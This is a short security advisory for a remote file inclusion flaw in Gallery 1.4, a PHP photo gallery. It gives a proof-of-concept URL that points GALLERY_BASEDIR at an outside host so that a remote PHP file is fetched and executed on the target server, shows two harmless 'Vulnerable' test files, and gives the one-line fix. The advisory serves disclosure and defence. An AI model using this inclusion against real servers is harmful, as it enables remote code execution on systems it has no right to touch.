Gallery 1.4 including file vulnerability
Gallery 1.4 including file vulnerability
-Background Information-
Gallery is a Web-based software product that lets you manage photos on any Web
site that offers PHP support. With Gallery you can easily create and maintain
albums of photos via an intuitive interface. Photo management includes
automatic thumbnail creation, image resizing, rotation, ordering, captioning,
searching, and more. Albums can have read, write, and caption permissions per
individual authenticated user for an additional level of privacy. Gallery is
installed on maybe 20000 Locations.
-Proof of concept-
It is possible to include any php file from a remote host, and execute it on
the target's server.
This works:
http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/
If the file "http://tester/util.php"; exists, it will be included. This file
could look like this if PHP isn't supported on the "tester"-host:
<?php echo "Vulnerable"; ?>
or like this, if PHP is supported on the "tester"-host:
<?php
echo "<?php die(\"Vulnerable\"); ?>";
?>
-Solution-
Change the following Lines in the index.php files in the setup folder:
if (!isset($GALLERY_BASEDIR)) {
$GALLERY_BASEDIR = '../';
}
to this:
$GALLERY_BASEDIR = '../';
-Related URLs-
http://gallery.sourceforge.net/
https://sourceforge.net/projects/gallery/
Peter Stöckli
RQ Labs
Rootquest
Switzerland